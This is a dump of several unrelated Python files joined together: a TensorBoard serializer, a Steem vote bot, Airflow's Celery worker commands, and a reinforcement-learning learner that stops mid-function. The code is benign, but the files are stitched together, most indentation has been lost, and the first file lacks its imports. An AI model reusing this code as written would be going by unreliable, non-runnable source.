BAD_CHARACTERS = "#%&{}\\/<>*? $!'\":@+`|="
DEFAULT_SUFFIX = '.json'
IMAGE_SUFFIX = '.png'
GRAPH_SUFFIX = '.pbtxt'
def Url(route, params):
"""Takes route and query params, and produce encoded url for that asset."""
out = route
if params:
# sorting ensures a unique filename for each query
sorted_params = sorted(six.iteritems(params))
out += '?' + urllib.urlencode(sorted_params)
return out
def Clean(s):
"""Clean a string so it can be used as a filepath."""
for c in BAD_CHARACTERS:
s = s.replace(c, '_')
return s
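# Illustrative only: a tiny example (not part of the original tool) of how Url() and
# Clean() cooperate to turn a route plus query params into a deterministic,
# filesystem-safe asset name. The route and params below are hypothetical.
def _example_asset_filename():
  url = Url('scalars', {'tag': 'loss', 'run': 'train'})  # params are sorted -> stable url
  return Clean(url) + DEFAULT_SUFFIX                     # -> 'scalars_run_train_tag_loss.json'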
class TensorBoardStaticSerializer(object):
"""Serialize all the routes from a TensorBoard server to static json."""
def __init__(self, connection, target_path):
self.connection = connection
EnsureDirectoryExists(os.path.join(target_path, 'data'))
self.path = target_path
def GetAndSave(self, url, save_suffix, unzip=False):
"""GET the given url. Serialize the result at clean path version of url."""
self.connection.request('GET',
'/data/' + url,
headers={'content-type': 'text/plain'})
response = self.connection.getresponse()
destination = self.path + '/data/' + Clean(url) + save_suffix
if response.status != 200:
raise IOError(url)
if unzip:
s = StringIO.StringIO(response.read())
content = gzip.GzipFile(fileobj=s).read()
else:
content = response.read()
with open(destination, 'w') as f:
f.write(content)
return content
def GetRouteAndSave(self, route, params=None):
"""GET given route and params. Serialize the result. Return as JSON."""
url = Url(route, params)
return json.loads(self.GetAndSave(url, DEFAULT_SUFFIX))
def Run(self):
"""Serialize everything from a TensorBoard backend."""
# get the runs object, which is an index for every tag.
runs = self.GetRouteAndSave('runs')
# collect sampled data.
self.GetRouteAndSave('scalars')
# now let's just download everything!
for run, tag_type_to_tags in six.iteritems(runs):
for tag_type, tags in six.iteritems(tag_type_to_tags):
try:
if tag_type == 'graph':
# in this case, tags is a bool which specifies if graph is present.
if tags:
url = Url('graph', {'run': run})
self.GetAndSave(url, GRAPH_SUFFIX, unzip=True)
elif tag_type == 'images':
for t in tags:
images = self.GetRouteAndSave('images', {'run': run, 'tag': t})
for im in images:
url = 'individualImage?' + im['query']
# pull down the images themselves.
self.GetAndSave(url, IMAGE_SUFFIX)
else:
for t in tags:
# Save this, whatever it is :)
self.GetRouteAndSave(tag_type, {'run': run, 'tag': t})
except IOError as e:
PrintAndLog('Retrieval failed for %s/%s/%s' % (tag_type, run, tags),
tf.logging.WARN)
PrintAndLog('Got Exception: %s' % e, tf.logging.WARN)
PrintAndLog('continuing...', tf.logging.WARN)
continue
def EnsureDirectoryExists(path):
if not os.path.exists(path):
os.makedirs(path)
def PrintAndLog(msg, lvl=tf.logging.INFO):
tf.logging.log(lvl, msg)
print(msg)
def main(unused_argv=None):
target = FLAGS.target
logdir = FLAGS.logdir
if not target or not logdir:
PrintAndLog('Both --target and --logdir are required.', tf.logging.ERROR)
return -1
if os.path.exists(target):
if FLAGS.overwrite:
if os.path.isdir(target):
shutil.rmtree(target)
else:
os.remove(target)
else:
PrintAndLog('Refusing to overwrite target %s without --overwrite' %
target, tf.logging.ERROR)
return -2
path_to_run = server.ParseEventFilesSpec(FLAGS.logdir)
PrintAndLog('About to load Multiplexer. This may take some time.')
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=server.TENSORBOARD_SIZE_GUIDANCE,
purge_orphaned_data=FLAGS.purge_orphaned_data)
server.ReloadMultiplexer(multiplexer, path_to_run)
PrintAndLog('Multiplexer load finished. Starting TensorBoard server.')
s = server.BuildServer(multiplexer, 'localhost', 0)
server_thread = threading.Thread(target=s.serve_forever)
server_thread.daemon = True
server_thread.start()
connection = http_client.HTTPConnection('localhost', s.server_address[1])
PrintAndLog('Server setup! Downloading data from the server.')
x = TensorBoardStaticSerializer(connection, target)
x.Run()
PrintAndLog('Done downloading data.')
connection.close()
s.shutdown()
s.server_close()
if __name__ == '__main__':
tf.app.run()
|
bot.py
|
# -*- coding:utf-8 -*-
from utils.logging.logger import logger
import os
import time
import random
import traceback
from threading import Thread, Timer
from beem.comment import Comment
from steem.settings import settings
from steem.comment import SteemComment
from steem.account import SteemAccount
from steem.writer import Writer
from steem.voter import Voter
from steem.uploader import Uploader
from steem.stream import SteemStream
from steem.collector import query
MINIMUM_VOTE_INTERVAL = 3 # seconds
VOTE_RETRIES = 5
class VoteBot:
def __init__(self, author, mode="stream.comment", config={}):
self.author = author
self.writer = Writer(author=self.author)
self.voter = Voter(author=self.author)
self.uploader = Uploader(author=self.author)
self.mode = mode
self.config = config
# the configuration functions for a vote bot
self.what_to_vote = None
self.who_to_vote = lambda : True
self.when_to_vote = lambda : 15
self.how_to_vote = lambda : 50
self.is_ready = lambda: True
self.after_success = lambda : True
self.last_vote_timestamp = -1
self._vote_queue = []
def _has_reply_comment(self, receiver, message_id):
comments = self._read_comments()
for c in comments:
# check the receiver and the message_id fingerprint
if c.parent_author == receiver and verify_message(message_id, c.body):
logger.info("I found I replied to @{} with message [{}] by searching comment history".format(receiver, message_id))
return (True, c)
return (False, None)
def _has_replied(self, receiver, message_id):
# has reply records in DB, or has replied by checking steem APIs
if self._has_reply_record(receiver, message_id):
return True
(replied, comment) = self._has_reply_comment(receiver, message_id)
if replied:
c = SteemComment(comment=comment.get_parent())
# cache the record into database since not found
self._add_reply_record(receiver, message_id, c, comment["created"])
return True
return False
def _get_reply_body(self, message_id, author):
account = SteemAccount(author)
comments_num = account.remaining_comments() or ''
daily_comments_num = round(account.daily_recovery_comments(), 1) or ''
return get_message(message_id).format(name=author, comments_num=comments_num, daily_comments_num=daily_comments_num)
def reply(self, message_id, post=None, url=None):
""" reply to the newbies' post """
c = SteemComment(comment=post, url=url)
receiver = c.get_comment().author
if not self._has_replied(receiver, message_id):
title = c.get_comment().title
message = self._get_reply_body(message_id, receiver)
self.writer.reply(c.get_comment(), message)
self._add_reply_record(receiver, message_id, c)
logger.info("Replied to @{}'s post [{}] with [{}] message".format(receiver, title, message_id))
return True
else:
logger.info("Skip reply account @{} with [{}] message, because we already reliped before".format(receiver, message_id))
return False
def vote(self, post=None, url=None, weight=None, retries=VOTE_RETRIES):
c = SteemComment(comment=post, url=url)
if retries <= 0:
logger.error("Vote {} failed after retries for {} times".format(c.get_url(), VOTE_RETRIES))
return False
while time.time() - self.last_vote_timestamp < MINIMUM_VOTE_INTERVAL:
wait_time = round(MINIMUM_VOTE_INTERVAL + random.random() * MINIMUM_VOTE_INTERVAL * 0.2, 2)
logger.info("Sleep {} seconds to avoid voting too frequently.".format(wait_time))
time.sleep(wait_time)
if time.time() - self.last_vote_timestamp >= MINIMUM_VOTE_INTERVAL:
return self.vote(post, url, weight, retries-1)
success = False
try:
weight = weight or self.weight(c)
success = self.voter.vote(c.get_comment(), weight=weight)
self.last_vote_timestamp = time.time()
except:
logger.error("Failed when voting {} with error: {} . {} retry times left.".format(c.get_url(), traceback.format_exc(), retries-1))
return self.vote(post, url, weight, retries-1)
self.after_success(success)
return success
def start_vote_queue(self):
logger.info("Start Vote Queue...")
def wait_for_vote():
while True:
while(len(self._vote_queue) > 0):
post = self._vote_queue.pop(0)
self.vote(post)
time.sleep(1)
logger.info("Vote Queue Stopped.")
Thread(target=wait_for_vote).start()
def append_to_vote_queue(self, post):
self._vote_queue.append(post)
def what(self, what_to_vote):
""" define the condition of vote for a post """
self.what_to_vote = what_to_vote
return self
def when(self, when_to_vote):
""" define the timing of vote for a post """
self.when_to_vote = when_to_vote
return self
def who(self, who_to_vote):
""" define when to vote the post """
self.who_to_vote = who_to_vote
return self
def how(self, how_to_vote):
""" define the weight of vote the post """
self.how_to_vote = how_to_vote
return self
def ready(self, is_ready):
""" define voter has met energy or other requirements """
self.is_ready = is_ready
return self
def done(self, after_success):
""" define the callback after vote is completed successfully """
self.after_success = after_success
return self
def context(self, ctx):
self.ctx = ctx
return self
def weight(self, post):
return self.how_to_vote(post)
def watch(self, ops):
author = ops['author']
def perform_vote():
if isinstance(ops, Comment):
c = SteemComment(comment=ops)
else:
c = SteemComment(ops=ops)
self.append_to_vote_queue(post=c.get_comment())
self.ctx(ops)
if self.what_to_vote(ops) and self.who_to_vote(author) and self.is_ready():
delay = self.when_to_vote(ops) # mins
if delay is not None and delay > 0:
secs = 60.0 * delay
logger.info("I'll vote after {} seconds".format(secs))
t = Timer(secs, perform_vote)
t.start()
else:
logger.info("I'll vote immediately")
perform_vote()
def run(self):
self.start_vote_queue()
if self.mode.startswith("stream."):
if self.mode == "stream.comment":
stream = SteemStream(operations=["comment"])
elif self.mode == "stream.vote":
stream = SteemStream(operations=["vote"])
stream.run(callback=self.watch)
elif self.mode.startswith("query."):
if self.mode == "query.comment.post":
self.config['mode'] = "post"
elif self.mode == "query.comment.comment":
self.config['mode'] = "comment"
elif self.mode == "query.comment.all":
self.config['mode'] = "post+comment"
for c in query(self.config):
self.watch(c)
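# --- Illustrative sketch (not shipped with this module) ---------------------------------
# A hypothetical example of how the fluent what()/who()/when()/how()/ready()/done()/context()
# setters above are meant to be chained before run(). The author name and every rule below
# are placeholders, not recommended settings.
def _build_example_bot():
    bot = VoteBot(author="some-curator", mode="stream.comment")
    bot.what(lambda ops: ops.get("parent_author") == "")   # only consider top-level posts
    bot.who(lambda author: author != "some-curator")       # never vote for ourselves
    bot.when(lambda ops: 15)                               # wait 15 minutes before voting
    bot.how(lambda post: 50)                               # vote with 50% weight
    bot.ready(lambda: True)                                # assume voting power is always sufficient
    bot.done(lambda success: success)                      # no-op callback after a successful vote
    bot.context(lambda ops: None)                          # no extra per-operation context handling
    return bot                                             # bot.run() would start the stream + vote queue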
|
celery_command.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Celery command"""
from multiprocessing import Process
from typing import Optional
import daemon
import psutil
import sqlalchemy.exc
from celery import maybe_patch_concurrency
from daemon.pidfile import TimeoutPIDLockFile
from lockfile.pidlockfile import read_pid_from_pidfile, remove_existing_pidfile
from airflow import settings
from airflow.configuration import conf
from airflow.executors.celery_executor import app as celery_app
from airflow.utils import cli as cli_utils
from airflow.utils.cli import setup_locations, setup_logging
from airflow.utils.serve_logs import serve_logs
WORKER_PROCESS_NAME = "worker"
@cli_utils.action_cli
def flower(args):
"""Starts Flower, Celery monitoring tool"""
options = [
"flower",
conf.get('celery', 'BROKER_URL'),
f"--address={args.hostname}",
f"--port={args.port}",
]
if args.broker_api:
options.append(f"--broker-api={args.broker_api}")
if args.url_prefix:
options.append(f"--url-prefix={args.url_prefix}")
if args.basic_auth:
options.append(f"--basic-auth={args.basic_auth}")
if args.flower_conf:
options.append(f"--conf={args.flower_conf}")
if args.daemon:
pidfile, stdout, stderr, _ = setup_locations(
process="flower",
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
with open(stdout, "w+") as stdout, open(stderr, "w+") as stderr:
ctx = daemon.DaemonContext(
pidfile=TimeoutPIDLockFile(pidfile, -1),
stdout=stdout,
stderr=stderr,
)
with ctx:
celery_app.start(options)
else:
celery_app.start(options)
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
def _run_worker(options, skip_serve_logs):
sub_proc = _serve_logs(skip_serve_logs)
try:
celery_app.worker_main(options)
finally:
if sub_proc:
sub_proc.terminate()
@cli_utils.action_cli
def worker(args):
"""Starts Airflow Celery worker"""
if not settings.validate_session():
raise SystemExit("Worker exiting, database connection precheck failed.")
autoscale = args.autoscale
skip_serve_logs = args.skip_serve_logs
if autoscale is None and conf.has_option("celery", "worker_autoscale"):
autoscale = conf.get("celery", "worker_autoscale")
# Setup locations
pid_file_path, stdout, stderr, log_file = setup_locations(
process=WORKER_PROCESS_NAME,
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
if hasattr(celery_app.backend, 'ResultSession'):
# Pre-create the database tables now, otherwise SQLA via Celery has a
# race condition where one of the subprocesses can die with "Table
# already exists" error, because SQLA checks for which tables exist,
# then issues a CREATE TABLE, rather than doing CREATE TABLE IF NOT
# EXISTS
try:
session = celery_app.backend.ResultSession()
session.close()
except sqlalchemy.exc.IntegrityError:
# At least on postgres, trying to create a table that already exists
# gives a unique constraint violation on the
# "pg_type_typname_nsp_index" index. If this happens we can ignore
# it, we raced to create the tables and lost.
pass
# Setup Celery worker
options = [
'worker',
'-O',
'fair',
'--queues',
args.queues,
'--concurrency',
args.concurrency,
'--hostname',
args.celery_hostname,
'--loglevel',
conf.get('logging', 'LOGGING_LEVEL'),
'--pidfile',
pid_file_path,
]
if autoscale:
options.extend(['--autoscale', autoscale])
if args.without_mingle:
options.append('--without-mingle')
if args.without_gossip:
options.append('--without-gossip')
if conf.has_option("celery", "pool"):
pool = conf.get("celery", "pool")
options.extend(["--pool", pool])
# Celery pools of type eventlet and gevent use greenlets, which
# requires monkey patching the app:
# https://eventlet.net/doc/patching.html#monkey-patch
# Otherwise task instances hang on the workers and are never
# executed.
maybe_patch_concurrency(['-P', pool])
if args.daemon:
# Run Celery worker as daemon
handle = setup_logging(log_file)
with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
if args.umask:
umask = args.umask
ctx = daemon.DaemonContext(
files_preserve=[handle],
umask=int(umask, 8),
stdout=stdout_handle,
stderr=stderr_handle,
)
with ctx:
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
else:
# Run Celery worker in the same process
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
@cli_utils.action_cli
def stop_worker(args):
"""Sends SIGTERM to Celery worker"""
# Read PID from file
if args.pid:
pid_file_path = args.pid
else:
pid_file_path, _, _, _ = setup_locations(process=WORKER_PROCESS_NAME)
pid = read_pid_from_pidfile(pid_file_path)
# Send SIGTERM
if pid:
worker_process = psutil.Process(pid)
worker_process.terminate()
# Remove pid file
remove_existing_pidfile(pid_file_path)
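# --- Illustrative sketch (separate from the commands above) -----------------------------
# A minimal example of the daemonization pattern that flower() and worker() use: acquire a
# PID lockfile, redirect stdout/stderr to a log file, and run the payload inside a
# DaemonContext. The paths and the payload are placeholders.
def _run_daemonized(payload, pid_path="/tmp/example.pid", out_path="/tmp/example.out"):
    with open(out_path, "w+") as out:
        ctx = daemon.DaemonContext(
            pidfile=TimeoutPIDLockFile(pid_path, -1),  # same lock timeout as the commands above
            stdout=out,
            stderr=out,
        )
        with ctx:  # detaches the process; everything below runs daemonized
            payload()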
|
learner.py
|
from typing import Tuple
import glob
import os
import shutil
import signal
import threading
import time
from collections import OrderedDict, deque
from os.path import join
from queue import Empty, Queue, Full
from threading import Thread
import numpy as np
import psutil
import torch
from torch.nn.utils.rnn import PackedSequence, invert_permutation
from torch.multiprocessing import Process, Event as MultiprocessingEvent
if os.name == 'nt':
from utils.faster_fifo_stub import Queue as MpQueue
else:
from faster_fifo import Queue as MpQueue
from algorithms.appooc.appooc_utils import TaskType, list_of_dicts_to_dict_of_lists, memory_stats, cuda_envvars_for_policy, \
TensorBatcher, iter_dicts_recursively, copy_dict_structure, ObjectPool
from algorithms.appooc.model import CPCA, create_actor_critic
from algorithms.appooc.population_based_training import PbtTask
from algorithms.utils.action_distributions import get_action_distribution, is_continuous_action_space
from algorithms.utils.algo_utils import calculate_gae, EPS
from algorithms.utils.pytorch_utils import to_scalar
from algorithms.utils.action_distributions import calc_num_logits, calc_num_actions
from utils.decay import LinearDecay
from utils.timing import Timing
from utils.utils import log, AttrDict, experiment_dir, ensure_dir_exists, join_or_kill, safe_get, safe_put
# noinspection PyPep8Naming
def _build_pack_info_from_dones(
dones: torch.Tensor,
T: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
"""
Create the indexing info needed to make the PackedSequence based on the dones.
PackedSequences are PyTorch's way of supporting a single RNN forward
call where each input in the batch can have an arbitrary sequence length
They work as follows: Given the sequences [c], [x, y, z], [a, b],
we generate data [x, a, c, y, b, z] and batch_sizes [3, 2, 1]. The
data is a flattened out version of the input sequences (the ordering in
data is determined by sequence length). batch_sizes tells you, for each
index, how many sequences have a length of (index + 1) or greater.
This method will generate the new index ordering such that you can
construct the data for a PackedSequence from a (N*T, ...) tensor
via x.index_select(0, select_inds)
"""
num_samples = len(dones)
rollout_boundaries = dones.clone().detach()
rollout_boundaries[T - 1::T] = 1 # end of each rollout is the boundary
rollout_boundaries = rollout_boundaries.nonzero().squeeze(dim=1) + 1
first_len = rollout_boundaries[0].unsqueeze(0)
if len(rollout_boundaries) <= 1:
log.debug(
'Only one rollout boundary. This can happen if batch size is 1, which is unlikely during real training.'
)
rollout_lengths = first_len
else:
rollout_lengths = rollout_boundaries[1:] - rollout_boundaries[:-1]
rollout_lengths = torch.cat([first_len, rollout_lengths])
rollout_starts_orig = rollout_boundaries - rollout_lengths
# done=True for the last step in the episode, so done flags rolled 1 step to the right will indicate
# first frames in the episodes
is_new_episode = dones.clone().detach().view((-1, T))
is_new_episode = is_new_episode.roll(1, 1)
# roll() is cyclical, so done=True in the last position in the rollout will roll to 0th position
# we want to avoid it here. (note to self: is there a function that does two of these things at once?)
is_new_episode[:, 0] = 0
is_new_episode = is_new_episode.view((-1,))
lengths, sorted_indices = torch.sort(rollout_lengths, descending=True)
# We will want these on the CPU for torch.unique_consecutive,
# so move now.
cpu_lengths = lengths.to(device='cpu', non_blocking=True)
# We need to keep the original unpermuted rollout_starts, because the permutation is later applied
# internally in the RNN implementation.
# From modules/rnn.py:
# Each batch of the hidden state should match the input sequence that
# the user believes he/she is passing in.
# hx = self.permute_hidden(hx, sorted_indices)
rollout_starts_sorted = rollout_starts_orig.index_select(0, sorted_indices)
select_inds = torch.empty(num_samples, device=dones.device, dtype=torch.int64)
max_length = int(cpu_lengths[0].item())
# batch_sizes is *always* on the CPU
batch_sizes = torch.empty((max_length,), device='cpu', dtype=torch.int64)
offset = 0
prev_len = 0
num_valid_for_length = lengths.size(0)
unique_lengths = torch.unique_consecutive(cpu_lengths)
# Iterate over all unique lengths in reverse, as they are sorted
# in decreasing order
for i in range(len(unique_lengths) - 1, -1, -1):
valids = lengths[0:num_valid_for_length] > prev_len
num_valid_for_length = int(valids.float().sum().item())
next_len = int(unique_lengths[i])
batch_sizes[prev_len:next_len] = num_valid_for_length
new_inds = (rollout_starts_sorted[0:num_valid_for_length].view(1, num_valid_for_length) +
torch.arange(prev_len, next_len, device=rollout_starts_sorted.device).view(
next_len - prev_len, 1)).view(-1)
# for a set of sequences [1, 2, 3], [4, 5], [6, 7], [8]
# these indices will be 1,4,6,8,2,5,7,3
# (all first steps in all trajectories, then all second steps, etc.)
select_inds[offset:offset + new_inds.numel()] = new_inds
offset += new_inds.numel()
prev_len = next_len
# Make sure we have an index for all elements
assert offset == num_samples
assert is_new_episode.shape[0] == num_samples
return rollout_starts_orig, is_new_episode, select_inds, batch_sizes, sorted_indices
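# Illustrative only: a minimal sketch (not used by the learner) of the PackedSequence layout
# described in the docstring of _build_pack_info_from_dones() above, using the same example
# sequences [c], [x, y, z], [a, b]. The numeric values are placeholders.
def _packed_sequence_layout_demo():
    from torch.nn.utils.rnn import pack_sequence
    c = torch.tensor([30.0])                     # sequence [c]
    xyz = torch.tensor([10.0, 11.0, 12.0])       # sequence [x, y, z]
    ab = torch.tensor([20.0, 21.0])              # sequence [a, b]
    packed = pack_sequence([c, xyz, ab], enforce_sorted=False)
    # data is flattened time-step-major across the length-sorted sequences: [x, a, c, y, b, z]
    # batch_sizes says how many sequences are still "alive" at each step: [3, 2, 1]
    assert packed.batch_sizes.tolist() == [3, 2, 1]
    return packed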
def build_rnn_inputs(x, dones_cpu, rnn_states, T: int):
"""
Create a PackedSequence input for an RNN such that each
set of steps that are part of the same episode are all part of
a batch in the PackedSequence.
Use the returned select_inds and build_core_out_from_seq to invert this.
:param x: A (N*T, -1) tensor of the data to build the PackedSequence out of
:param dones_cpu: A (N*T) tensor where dones[i] == 1.0 indicates an episode is done, a CPU-bound tensor
:param rnn_states: A (N*T, -1) tensor of the rnn_hidden_states
:param T: The length of the rollout
:return: tuple(x_seq, rnn_states, select_inds)
WHERE
x_seq is the PackedSequence version of x to pass to the RNN
rnn_states are the corresponding rnn state, zeroed on the episode boundary
inverted_select_inds can be passed to build_core_out_from_seq so the RNN output can be retrieved
"""
rollout_starts, is_new_episode, select_inds, batch_sizes, sorted_indices = _build_pack_info_from_dones(dones_cpu, T)
inverted_select_inds = invert_permutation(select_inds)
def device(t):
return t.to(device=x.device)
select_inds = device(select_inds)
inverted_select_inds = device(inverted_select_inds)
sorted_indices = device(sorted_indices)
rollout_starts = device(rollout_starts)
is_new_episode = device(is_new_episode)
x_seq = PackedSequence(x.index_select(0, select_inds), batch_sizes, sorted_indices)
# We zero-out rnn states for timesteps at the beginning of the episode.
# rollout_starts are indices of all starts of sequences
# (which can be due to episode boundary or just boundary of a rollout)
# (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts) gives us a zero for every beginning of
# the sequence that is actually also a start of a new episode, and by multiplying this RNN state by zero
# we ensure no information transfer across episode boundaries.
rnn_states = rnn_states.index_select(0, rollout_starts)
is_same_episode = (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts)
rnn_states = rnn_states * is_same_episode
return x_seq, rnn_states, inverted_select_inds
def build_core_out_from_seq(x_seq: PackedSequence, inverted_select_inds):
return x_seq.data.index_select(0, inverted_select_inds)
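# Illustrative only: a minimal usage sketch (not called anywhere in this file) of the two
# helpers above, assuming a flattened rollout tensor of shape (N*T, hidden) and a GRU core.
# The argument names mirror build_rnn_inputs(); shapes are illustrative.
def _rnn_over_rollouts_demo(x, dones_cpu, rnn_states, T, core):
    # x:          (N*T, hidden) inputs, rollout-major
    # dones_cpu:  (N*T,) tensor of episode-termination flags, kept on the CPU
    # rnn_states: (N*T, hidden) stored hidden states (only the rollout starts are used)
    # core:       e.g. torch.nn.GRU(hidden_size, hidden_size)
    x_seq, init_states, inverted_select_inds = build_rnn_inputs(x, dones_cpu, rnn_states, T)
    out_seq, _ = core(x_seq, init_states.unsqueeze(0).contiguous())  # PackedSequence in and out
    # restore the original (N*T, hidden) ordering so the output lines up with the rest of the batch
    return build_core_out_from_seq(out_seq, inverted_select_inds)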
class LearnerWorker:
def __init__(
self,
worker_idx,
policy_id,
cfg,
obs_space,
action_space,
report_queue,
policy_worker_queues,
shared_buffers,
policy_lock,
resume_experience_collection_cv,
):
log.info('Initializing the learner %d for policy %d', worker_idx, policy_id)
self.worker_idx = worker_idx
self.policy_id = policy_id
self.cfg = cfg
# PBT-related stuff
self.should_save_model = True # set to true if we need to save the model to disk on the next training iteration
self.load_policy_id = None # non-None when we need to replace our parameters with another policy's parameters
self.pbt_mutex = threading.Lock()
self.new_cfg = None # non-None when we need to update the learning hyperparameters
self.terminate = False
self.num_batches_processed = 0
self.obs_space = obs_space
self.action_space = action_space
self.num_actions = calc_num_actions(action_space)
self.num_action_logits = calc_num_logits(action_space)
self.rollout_tensors = shared_buffers.tensor_trajectories
self.traj_tensors_available = shared_buffers.is_traj_tensor_available
self.policy_versions = shared_buffers.policy_versions
self.stop_experience_collection = shared_buffers.stop_experience_collection
self.shared_buffers = shared_buffers
self.stop_experience_collection_num_msgs = self.resume_experience_collection_num_msgs = 0
self.device = None
self.actor_critic = None
self.aux_loss_module = None
self.optimizer = None
self.policy_lock = policy_lock
self.resume_experience_collection_cv = resume_experience_collection_cv
self.task_queue = MpQueue()
self.report_queue = report_queue
self.initialized_event = MultiprocessingEvent()
self.initialized_event.clear()
self.model_saved_event = MultiprocessingEvent()
self.model_saved_event.clear()
# queues corresponding to policy workers using the same policy
# we send weight updates via these queues
self.policy_worker_queues = policy_worker_queues
self.experience_buffer_queue = Queue()
self.tensor_batch_pool = ObjectPool()
self.tensor_batcher = TensorBatcher(self.tensor_batch_pool)
self.with_training = True # set to False for debugging no-training regime
self.train_in_background = self.cfg.train_in_background_thread # set to False for debugging
self.training_thread = Thread(target=self._train_loop) if self.train_in_background else None
self.train_thread_initialized = threading.Event()
self.is_training = False
self.train_step = self.env_steps = 0
# decay rate at which summaries are collected
# save summaries every 20 seconds in the beginning, but decay to every 4 minutes in the limit, because we
# do not need frequent summaries for longer experiments
self.summary_rate_decay_seconds = LinearDecay([(0, 20), (100000, 120), (1000000, 240)])
self.last_summary_time = 0
self.last_saved_time = self.last_milestone_time = 0
self.discarded_experience_over_time = deque([], maxlen=30)
self.discarded_experience_timer = time.time()
self.num_discarded_rollouts = 0
self.process = Process(target=self._run, daemon=True)
if is_continuous_action_space(
self.action_space) and self.cfg.exploration_loss == 'symmetric_kl':
raise NotImplementedError('KL-divergence exploration loss is not supported with '
'continuous action spaces. Use entropy exploration loss')
if self.cfg.exploration_loss_coeff == 0.0:
self.exploration_loss_func = lambda action_distr, option_idx: 0.0
elif self.cfg.exploration_loss == 'entropy':
self.exploration_loss_func = self.entropy_exploration_loss
elif self.cfg.exploration_loss == 'symmetric_kl':
self.exploration_loss_func = self.symmetric_kl_exploration_loss
else:
raise NotImplementedError(f'{self.cfg.exploration_loss} not supported!')
def start_process(self):
self.process.start()
def _init(self):
log.info('Waiting for the learner to initialize...')
self.train_thread_initialized.wait()
log.info('Learner %d initialized', self.worker_idx)
self.initialized_event.set()
def _terminate(self):
self.terminate = True
def _broadcast_model_weights(self):
state_dict = self.actor_critic.state_dict()
policy_version = self.train_step
log.debug('Broadcast model weights for model version %d', policy_version)
model_state = (policy_version, state_dict)
for q in self.policy_worker_queues:
q.put((TaskType.INIT_MODEL, model_state))
def _calculate_gae(self, buffer):
"""
Calculate advantages using Generalized Advantage Estimation.
This is left over from the previous version of the algorithm.
Perhaps should be re-implemented in PyTorch tensors, similar to V-trace for uniformity.
"""
rewards = torch.stack(buffer.rewards).numpy().squeeze() # [E, T]
dones = torch.stack(buffer.dones).numpy().squeeze() # [E, T]
values_arr = torch.stack(buffer.values).numpy().squeeze() # [E, T]
# calculating fake values for the last step in the rollout
# this will make sure that advantage of the very last action is always zero
values = []
for i in range(len(values_arr)):
last_value, last_reward = values_arr[i][-1], rewards[i, -1]
next_value = (last_value - last_reward) / self.cfg.gamma
values.append(list(values_arr[i]))
values[i].append(float(next_value)) # [T] -> [T+1]
# calculating returns and GAE
rewards = rewards.transpose((1, 0)) # [E, T] -> [T, E]
dones = dones.transpose((1, 0)) # [E, T] -> [T, E]
values = np.asarray(values).transpose((1, 0)) # [E, T+1] -> [T+1, E]
advantages, returns = calculate_gae(rewards, dones, values, self.cfg.gamma, self.cfg.gae_lambda)
# transpose tensors back to [E, T] before creating a single experience buffer
buffer.advantages = advantages.transpose((1, 0)) # [T, E] -> [E, T]
buffer.returns = returns.transpose((1, 0)) # [T, E] -> [E, T]
buffer.returns = buffer.returns[:, :, np.newaxis] # [E, T] -> [E, T, 1]
buffer.advantages = [torch.tensor(buffer.advantages).reshape(-1)]
buffer.returns = [torch.tensor(buffer.returns).reshape(-1)]
return buffer
def _mark_rollout_buffer_free(self, rollout):
r = rollout
self.traj_tensors_available[r.worker_idx, r.split_idx][r.env_idx,
r.agent_idx,
r.traj_buffer_idx] = 1
def _index_values_in_buffer(self, buffer):
for rollout_idx in range(len(buffer.values)):
values, option_idx = buffer.values[rollout_idx], buffer.option_idx[rollout_idx]
buffer.values[rollout_idx] = self._index_via_option_idx_in_rollout(values, option_idx)
def _index_via_option_idx_in_rollout(self, tensor, option_idx):
assert tensor.shape[1] == self.cfg.num_options, "Must pass in B x num_options to index with option_idx"
assert tensor.shape[0] == option_idx.shape[0], "Must have same B (batch) dim"
assert option_idx.shape[1] == 1
assert len(option_idx.shape) == 2
idx = option_idx.reshape(option_idx.shape + (1,) * len(tensor.shape[2:]))
idx = idx.expand((tensor.shape[0], -1) +
tensor.shape[2:]).long() # B x 1 x <E> where shape of tensor (B x O x <E>)
return torch.gather(tensor, 1, idx).squeeze() # B x 1 x <E>
def _prepare_train_buffer(self, rollouts, macro_batch_size, timing):
trajectories = [AttrDict(r['t']) for r in rollouts]
with timing.add_time('buffers'):
buffer = AttrDict()
# by the end of this loop the buffer is a dictionary containing lists of numpy arrays
for i, t in enumerate(trajectories):
for key, x in t.items():
if key not in buffer:
buffer[key] = []
buffer[key].append(x)
# convert lists of dict observations to a single dictionary of lists
for key, x in buffer.items():
if isinstance(x[0], (dict, OrderedDict)):
buffer[key] = list_of_dicts_to_dict_of_lists(x)
if not self.cfg.with_vtrace:
with timing.add_time('calc_gae'):
self._index_values_in_buffer(buffer)
buffer = self._calculate_gae(buffer)
with timing.add_time('batching'):
# concatenate rollouts from different workers into a single batch efficiently
# that is, if we already have memory for the buffers allocated, we can just copy the data into
# existing cached tensors instead of creating new ones. This is a performance optimization.
use_pinned_memory = self.cfg.device == 'gpu'
buffer = self.tensor_batcher.cat(buffer, macro_batch_size, use_pinned_memory, timing)
with timing.add_time('buff_ready'):
for r in rollouts:
self._mark_rollout_buffer_free(r)
with timing.add_time('tensors_gpu_float'):
device_buffer = self._copy_train_data_to_device(buffer)
with timing.add_time('squeeze'):
# will squeeze actions only in simple categorical case
tensors_to_squeeze = [
'actions', # 'log_prob_actions',
